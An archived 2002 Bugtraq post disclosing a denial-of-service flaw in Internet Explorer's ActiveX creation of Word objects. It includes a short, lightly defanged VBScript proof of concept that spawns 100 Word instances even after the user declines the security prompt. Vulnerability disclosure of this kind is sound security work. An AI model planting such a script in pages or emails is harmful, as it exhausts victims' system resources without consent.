[25012] in bugtraq


IE Word ActiveX DoS Loop

daemon@ATHENA.MIT.EDU (eflorio@edmaster.it)
Tue Apr 9 16:14:35 2002

Date: 8 Apr 2002 19:40:17 -0000
Message-ID: <20020408194017.18016.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <eflorio@edmaster.it>
To: bugtraq@securityfocus.com



There is a flaw in ActiveX object creation
used in VBScript for the Word object; this can
be used as a Denial of Service.

Try to use this code (remove "_" before using it):

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

This script will activate the security warning about
creation of an ActiveX object, but when someone
clicks on "NO" and denies execution
of the script, the script is stopped, but
the creation of Word objects in memory still
continues. This sample script creates 100 Word
objects in memory... it's a real DoS!
(try CTRL+ALT+DEL to see them)

Works for IE/Outlook Express and Word2000/XP
objects. Other Office components (Excel, PowerPoint,
Access, etc.) may not be affected.

Elia Florio
